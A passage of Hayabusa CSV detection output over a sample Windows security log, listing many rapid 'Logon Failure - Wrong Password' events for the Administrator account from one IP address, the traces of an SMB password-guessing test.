+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kn9WWWqCIwfrPbie | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:00.156 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AQcamLSzsXOjP6FL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:00.278 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6R6ZMRoYkAPB35Bq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:00.349 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ubqnZm0jmHNFCHrM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:00.419 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7ORQ8vL1oo6CkJXK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:00.473 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rDPl1SSddrWEs979 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:00.585 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VrK7fENAr1lxFr9x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:00.633 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wu4djhEVSMYBOmjF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:00.677 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7e0NOdXhEkW6MskA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:00.715 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7nqxLHaOtkHHNAa1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:00.756 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NCrCf73NtEpk5DUR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:00.796 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YVFm1epksVGO1nFY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:00.842 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YmVehuMHvh5kVqRW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:00.875 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sERZrNUHsKVEShCb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:00.901 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eaSNgw2hvkxLnQF8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:00.940 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FSYOWptgxHYTDv1x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:00.984 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Van1qwuRoWYPWrIY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:01.025 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TyLCa9OHocazZKQ2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:01.068 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XxrR5iUsTI9LVnLL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:01.110 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TxMREacN0QfvL51B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:01.156 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7fbzSHaZBDH4zFZZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:01.200 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NgIei0bMIcslJCVa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:01.236 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JPoKjwanczELBC5A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:01.290 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QOYMVAnCWB2RFYAk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:01.328 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k1S45GBtQ8Uoyilw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:01.378 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 60oeDAnU41sz1wYg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:01.424 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: enjlrrdf6lrm7Bao | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:01.465 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 58WzO6wxh7QshZgS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:01.505 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7eZKzHgu5ADLYsWU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:01.548 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uOSK3xC1E5PpBVNM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:01.598 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vFXasYWGCHbQOWWI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:01.648 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4XlYJ3oHYKYhg0KC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:01.691 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LxOKwi8Q4y2mHBDu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:01.745 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xwFKFySH4w2yWtPX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:01.794 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OlwGTGadOEMfUFiM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:01.836 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hZ9WuMoOtxGdwOQn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:01.888 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cCLK0gWvRoz0Ceao | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:01.936 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZDrcOxtm2fHXK5pO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:01.976 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pm2tPGetcAJkSuvK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:02.016 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FBskiUSfF2ghuDcF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:02.050 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mZJal2nq3JAk6I2S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:02.093 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y9ek0Sl1ikhIfIb6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:02.141 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eHrn5Tp9JtnAgCbE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:02.197 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k7tR8gp2piqqixqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:02.245 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SqSBRMoiFeWe4FAt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:02.297 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Nu4m1xKDU0OUkoR0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:02.354 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gui98cdQHPgyNOZI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:02.407 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bm4U7TAfsPTEiygC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:02.457 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fDOoaVWVFAMLiA71 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:02.497 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qiJeLgInEkHffefo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:02.547 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yWyguWQP2iYUArhD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:02.595 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vDa3GqsTMMXguFhi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:02.645 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Lr0lkAcdnji1zjW4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:02.693 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4WfNFd5MkQxaxHGP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:02.741 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j8hdPhtxP4Ds65yV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:02.793 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y2BBoWoXWXuRysTx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:02.884 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6GEhZ2BduHwjJj9H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:02.927 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GbwEHQCAUJd64LlA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:02.967 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wGfoObbN8ioefyce | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:03.009 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iLHhCgHvmOzoLLqG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:03.050 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v9KL69y47DMyFOWT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:03.098 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ECuVYiqdMw2dMjT6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:03.150 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YJCYumRekD7AREYQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:03.196 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0H4OxKzoemZrsosT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:03.238 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wSHnvxa0khWdWBVx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:03.288 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bJkPp0bghDCPYz52 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:03.333 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SfHRWGXjCej9HSPb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:03.383 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X42H7EvrvzsRqXWO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:03.432 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: moo42NdOq30Gnz3T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:03.475 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A4NHVYxxDkCOsQw8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:03.524 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iPUiW0vFQB405kwS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:03.573 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OtcZ4ymkeLHeU7YJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:03.620 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZxZCDKWtqkGJ0dnw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:03.666 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f4GGnhttZgmRPRJo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:03.716 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gI0j9w45eXEFeex3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:03.764 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BVZ2YRDUAOsNgKxo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:03.822 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VJfIpxlcwVf7pWga | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:03.858 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Oerixd9ODF6fslsC | IP Addr: 192.168.198.149 | AuthPackage: 